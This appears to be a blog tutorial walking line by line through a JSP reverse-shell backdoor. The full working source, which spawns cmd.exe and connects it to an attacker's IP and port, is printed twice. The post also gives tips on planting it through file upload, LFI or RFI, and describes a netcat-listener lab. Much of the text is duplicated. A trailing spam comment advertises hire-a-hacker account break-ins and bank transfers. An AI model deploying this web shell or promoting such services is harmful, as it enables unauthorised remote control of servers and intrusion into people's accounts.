What is the purpose?
Web shells provide means to communicate with the operating system installed on the server via the interpreter or execution environment of the web scripting language. Hence OS specific commands can be executed over HTTP.
What is the beauty ?
Often one can find a vulnerability in web applications where file upload is possible. Also google more for LFI (Local File Inclusion) and RFI (Remote File Inclusion).
The web shell file has to be made to execute on server. But this can be done by simply accessing the web shell file through your browser !!
E.g. http://www.example.com/mywebshell.jsp.
The execution is possible because the interpreter or the execution environment first parses the file to generate dynamic HTML.
The request and response over http makes it connect over port 80. This port is often allowed by the firewalls for incoming and outgoing connections. Hence firewall goes out of the picture
Lets dissectAs I am familiar with jsp, I pick up the jsp reverse shell for detailed programming walkthrough.
Basic knowledge of java and jsp is needed for further reading.
PHP Code:
// backdoor.jsp
// http://www.security.org.sg/code/jspreverse.html<%@page import="java.lang.*, java.util.*, java.io.*, java.net.*"%>
<%!
static class StreamConnector extends Thread{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
{
}
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
{
}
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">IP Address<input type="text" name="ipaddress" size=30>Port<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<%String ipAddress = request.getParameter("ipaddress");String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
{
}
}
%>
<!-- http://michaeldaw.org 2006 -->
// http://www.security.org.sg/code/jspreverse.html<%@page import="java.lang.*, java.util.*, java.io.*, java.net.*"%>
<%!
static class StreamConnector extends Thread{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
{
}
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
{
}
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">IP Address<input type="text" name="ipaddress" size=30>Port<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<%String ipAddress = request.getParameter("ipaddress");String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
{
}
}
%>
<!-- http://michaeldaw.org 2006 -->
I have taken help from this post here >>http://www.security.org.sg/code/jspreverse.html
Code:
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
%>
Jsp directive to import all package in java.lang , java.util , java.io and java.net
java.util is generally for dates and other utilities.
java.io is for input-output
java.net is for sockets
---------------------------------------------------------------------------
java.util is generally for dates and other utilities.
java.io is for input-output
java.net is for sockets
---------------------------------------------------------------------------
Code:
static class StreamConnector extends Thread
This is the class written for connecting an OutputStream to an InputStream. It inherits class Thread. Hence we can see that Java thread implementation has been done which requires that any class implementing multithreading in Java can do so by inheriting Thread class ( extends Thread) and overwriting the run() method
This whole class is written to connect Input stream of process to be spawned to output stream of socket.And Input Stream of socket to output stream of process to be spawned .
What is socket ? Well consider socket as a slot opened by computer to receive and send via network connection. Read network programming in java for more details.
---------------------------------------------------------------------------
This whole class is written to connect Input stream of process to be spawned to output stream of socket.And Input Stream of socket to output stream of process to be spawned .
What is socket ? Well consider socket as a slot opened by computer to receive and send via network connection. Read network programming in java for more details.
---------------------------------------------------------------------------
Code:
InputStream is;
InputStream abstract class is the superclass of all classes representing an input stream of bytes. We make an object is of the this class.
Code:
OutputStream os;
OutputStream abstract class is the superclass of all classes representing an output stream of bytes. An output stream accepts output bytes and sends them to some sink. We make an object os of this class.
---------------------------------------------------------------------------
---------------------------------------------------------------------------
Code:
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
Constructor is made for StreamConnector class .Objects of InputStream and OutputStream are passed as arguments.
this.is = is initializes the is variable in the current object of StreamConnector with the passed object of InputStream in argument.
Same for this.os=os
---------------------------------------------------------------------------
this.is = is initializes the is variable in the current object of StreamConnector with the passed object of InputStream in argument.
Same for this.os=os
---------------------------------------------------------------------------
Code:
public void run()
this method contains code which will run in separate Thread.
---------------------------------------------------------------------------
---------------------------------------------------------------------------
Code:
BufferedReader isr = null;
BufferedWriter osw = null;
Making objects of BufferedReader class
Code:
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
Initializing objects by passing InputStreamReader object which was in turn made by passing the object of InputStream is as argument to InputStreamReader.
Now we can play with isr and osw objects .
---------------------------------------------------------------------------
Now we can play with isr and osw objects .
---------------------------------------------------------------------------
Code:
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
We define buffer char array and a int lenRead to monitor length of buffer.
We read input from isr object by calling isr.read and passing it the buffer argument to store it in buffer array.
We then take this buffer array and write it to osw object while the buffer length is greater than 0.
---------------------------------------------------------------------------
We read input from isr object by calling isr.read and passing it the buffer argument to store it in buffer array.
We then take this buffer array and write it to osw object while the buffer length is greater than 0.
---------------------------------------------------------------------------
Code:
if(isr != null) isr.close();
if(osw != null) osw.close();
Closing the isr and osw objects streams after the job is done.
---------------------------------------------------------------------------
---------------------------------------------------------------------------
Code:
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
Obtaining the ip and the port from the FORM on the page which will be presented on accessing the jsp file.
---------------------------------------------------------------------------
---------------------------------------------------------------------------
Code:
Socket sock = null;
Defining an object of Socket class used for networking in Java
Code:
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Obtaining an object of Socket class by passing the ip and port value as arguments.
---------------------------------------------------------------------------
---------------------------------------------------------------------------
Code:
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
The Runtime class is the class which is going to do the most important job of all , i.e., executing and spawning a process
Look here for full specifications of Runtime class >> http://download.oracle.com/javase/1....g/Runtime.html
We get an object rt of Runtime class by calling the getRuntime() method
We Pass the argument cmd.exe for execution to this object and a Process object proc is returned.
Via proc we can interact with this new spawned process, i.e. cmd.exe in this case.
---------------------------------------------------------------------------
Look here for full specifications of Runtime class >> http://download.oracle.com/javase/1....g/Runtime.html
We get an object rt of Runtime class by calling the getRuntime() method
We Pass the argument cmd.exe for execution to this object and a Process object proc is returned.
Via proc we can interact with this new spawned process, i.e. cmd.exe in this case.
---------------------------------------------------------------------------
Code:
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
Making 2 objects for StreamConnector class . Remember firstly to connect input stream of cmd.exe ( via which it will receive) to output stream of socket ( via which it will send to process)
Secondly, to connect input stream of socket (via which it will receive from process ) to output stream of process ( via which it will send to socket). Confusing … ehh
---------------------------------------------------------------------------
Secondly, to connect input stream of socket (via which it will receive from process ) to output stream of process ( via which it will send to socket). Confusing … ehh
---------------------------------------------------------------------------
Code:
outputConnector.start();
inputConnector.start();
2 separate threads for each object is started . Hence the joining of streams will take place in 2 separated threads .
---------------------------------------------------------------------------
---------------------------------------------------------------------------
This is the reverse connecting shell. This means by taking ip and port of attacker machine over http, it will try to connect back to it . Hence the attacker can have a netcat service listening on the port he entered in the FORM. The command prompt of windows will be achieved if the jsp Apache Tomcat server is running on a Windows machine.
Screenshots -- >>
Setting up Apache Tomcat server on Windows 7
The attacker backtrack machine in VMware with ip level connectivity with host machine. The netcat service listening on port 9999.
Accessing the URL and feeding ip of Backtrack machine ( attacker ip ) and port
Command prompt shell is obtained on Backtrack ( attacker ) machine
Screenshots -- >>
Setting up Apache Tomcat server on Windows 7
The attacker backtrack machine in VMware with ip level connectivity with host machine. The netcat service listening on port 9999.
Accessing the URL and feeding ip of Backtrack machine ( attacker ip ) and port
Command prompt shell is obtained on Backtrack ( attacker ) machine
Are you interested in the service of a hacker to get into a phone, facebook account, snapchat, Instagram, yahoo, Whatsapp, get verified on any social network account, increase your followers by any amount, bank wire and bank transfer. Contact him on= hackintechnology.com hackintechnology@gmail.com +12132951376(WHATSAPP)
ReplyDelete